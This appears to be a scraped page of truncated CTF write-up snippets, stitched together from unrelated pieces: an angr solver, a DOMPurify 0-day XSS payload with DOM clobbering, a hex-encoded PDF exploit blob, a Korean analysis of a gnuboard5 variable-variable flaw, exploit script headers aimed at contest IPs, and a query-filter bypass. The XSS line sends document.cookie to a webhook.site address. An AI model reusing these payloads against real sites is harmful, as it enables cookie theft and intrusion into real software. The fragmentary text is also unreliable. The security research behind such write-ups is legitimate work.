by sqrtrev
#Code by sqrtrev@WreckTheLine | |
import angr | |
def main(): | |
p = angr.Project("reversing") | |
simgr = p.factory.simulation_manager(p.factory.full_init_state()) | |
simgr.explore(find=lambda s:b'correct' in s.posix.dumps(1)) | |
return simgr.found[0].posix.dumps(0) |
Craft url via DOM Clobbering | |
And xss via DOMPurify 0-day(now patched, https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d ) | |
[<a id=a><a id=a name=b href="//webhook.site/f43558da-640a-4ad3-817e-6144d4bc2e7d/" />] | |
<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=location.href=a.b.href+document.cookie"> |
# python2 | |
# 0-day by Merona-Hunters (SeungHyun Kim, SeungJun Kim, MinKi Jang, DoHyun Lee) | |
value = "255044462D312E330A352030206F626A0A3C3C202F53202F476F546F202F44205B362030205220202F466974205D203E3E0A656E646F626A0A392030206F626A203C3C0A2F4C656E67746820313731202020202020200A2F46696C746572202F466C6174654465636F64650A3E3E0A73747265616D0A78DA8D4FBB0EC2300CDCF315F7033576EBA4E98E8460AB1811132F09A942EDC2EFE3B4B4042614D9774AEECE8E80ED082A6A9AA99D3A478A1BAC6D32D6BBC39171768C9DD5DDEAE992D547A1A008E229780C175CDDDEB599918DB0A118CA88D3C4D15819B581B3E617676DE12B1397F041D3B0CC312B34A5C977DAE2D6C8B64AA14D4DEC93023D986AE5104649CEEDB55F9CEF8BD5B613AC1FF62DB49F54A132F5483EFEBBD10B287545CD656E6473747265616D0A656E646F626A0A362030206F626A203C3C0A2F54797065202F506167650A2F436F6E74656E74732039203020520A2F5265736F75726365732038203020520A2F4D65646961426F78205B302030203538392E3631303632332E36325D0A2F5472616E73203C3C202F53202F52202F442030203E3E0A2F506172656E74203132203020520A3E3E20656E646F626A0A372030206F626A203C3C0A2F54797065202F584F62 |
POST /submit HTTP/1.1 | |
Host: webp.bcactf.com:49153 | |
Content-Length: 985 | |
Cache-Control: max-age=0 | |
Upgrade-Insecure-Requests: 1 | |
Origin: http://webp.bcactf.com:49153 | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.272 Whale/2.9.118.16 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | |
Referer: http://webp.bcactf.com:49153/ |
https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L65 를 보게되면, HttpClient
클래스를 이용해서 $authUrl
에 통신을 시도한다. 여기서 $authUrl
은 $_REQUEST
를 통해서 전달되며 (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L33) 우리가 컨트롤 가능한 값이다. https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L176를 보면 리퀘스트를 보내고, 실패했을 경우 response body를 $netcancelResultString
에 저장한다. 이후, https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L186-L187에서 str_replace를 해주는데 여기서 취약점이 발생하게 된다. PHP의 특성상 $$변수
의 형태로 값을 사용할 경우, $변수내용
을 참조한 것과 같은 행동을 취하게 된다. 따라서, 첫번째 str_replace에서 $body내용
을 참고하게 하고, 두번째 str_replace에서는 우리가 원하는 변수에 접근하게 된다. 여기서, $authToken
은 우리가 컨트롤 가능한 값이므로 (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L31), 해당 변수를 이용하기로 했다. authToken=flag
로 주고, HttpClient->body에서 authToken
을 리턴한다고 가정하자. str_replace 과정에서 $$Http->body
== $authToken
이 될 것이다. 즉, `$netca
We can save the payload in the username or somewhere and then execute it with reading /proc/self/mem Run both of the scripts and the same time. One of them inject payloads and the other one search for it. Since we are reading the memory, some links that the script outputs might expire.
#!/usr/bin/env python3
import requests
# target = 'http://localhost:8002'
target = 'http://35.243.100.112'
# target = 'http://localhost:10100'
Using STTF and nginx cache header, we can leak the admin's flag.
#!/usr/bin/env python3
import requests
import random
import time
target = 'http://35.187.204.223'
rfile = open('./a','r') #a has nothing interesting
We can make more query variable using `;`. So, We can bypass the filtering. | |
(they are using parse_qsl for getting query) | |
Payload: | |
/view?{MyClienID}=flag;/%2e%2e/=123 |
(Written by okas832 and Reinose. I just uploaded this)
Need to serialize message with protobuf to send data. But protocol.proto
file not given.
Serialized descriptor_pb2.FileDescriptorProto is at 0x416700:0x4168B0.
Recovered protocol.proto
with blackbox analysis because couldn't find related documents.
0A 0E 70 72 6F 74 6F 63 6F 6C 2E 70 72 6F 74 6F filename : "protocol.proto"